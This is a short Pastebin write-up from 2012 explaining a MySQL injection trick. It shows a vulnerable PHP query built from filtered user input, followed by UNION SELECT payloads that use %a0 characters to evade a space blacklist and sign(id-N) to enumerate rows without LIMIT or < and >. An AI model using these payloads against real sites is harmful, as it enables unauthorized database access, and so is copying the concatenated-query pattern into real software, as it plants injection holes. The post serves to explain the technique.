SHARE
TWEET

Untitled

a guest Jul 11th, 2012 369 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /* ***************************************************************************************
  2. * mySQL Injection - getting records from a Db without using "<", ">" or "limit"          *
  3. * @Author : Twitter.com/PaulDS_FR                                                        *
  4. **************************************************************************************** */
  5.  
  6. So yesterday i was working on a complicated to exploit SQL Injection... Basically the code was (i guess) something like this :
  7.  
  8. $blacklist = array('"',"'",' ', ','); //simplified, had a lot more in there !
  9. $id = htmlentities(str_replace($blacklist, '', $_GET['id']));
  10. $res = $dbh->query('select * from table where id= ' . $id)->fetch();
  11. echo $res->id . $res->text;
  12.  
  13. So the first record is easy to get (classic SQL injection i'll not cover) but how do go on and get the next(s) row(s) knowing you cannot play with limit (requires a coma) nor with the "less than" (<) or "more than" (>) operators as they are converted into html entities (who does that by the way !) ?
  14.  
  15. Well i figured this trick out :
  16.  
  17. ?id=-1 union %a0 select %a0 column1,column2 %a0 from %a0 table %a0 where %a0 sign(id-1)!=-1
  18. ?id=-1 union %a0 select %a0 column1,column2 %a0 from %a0 table %a0 where %a0 sign(id-2)!=-1
  19. ...
  20.  
  21. Without the %a0 to insert nbsp (evade the blacklisting of spaces) :
  22.  
  23. ?id=-1 union select column1,column2 from table where sign(id-prev_id)!=-1
  24.  
  25. Important part is  : where sign(id-prev_id)!=-1
  26.  
  27. It also worked (as was my case) to get other records from the same table without knowing their ids. I had 3 rows printed (ids 1,2,3) out of a count of 4 rows in the table... Where are you little id ?
  28.  
  29. ?id=sign(id-4)!=-1
  30. ?id=sign(id)=-1
  31.  
  32. The id I was searching for was 1337 (of course :))
  33.  
  34. Ref :
  35. http://dev.mysql.com/doc/refman/5.0/en/mathematical-functions.html#function_sign
  36.  
  37. Paul da Silva - 07/11/2012 - Pardon my english, I'm french ;)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top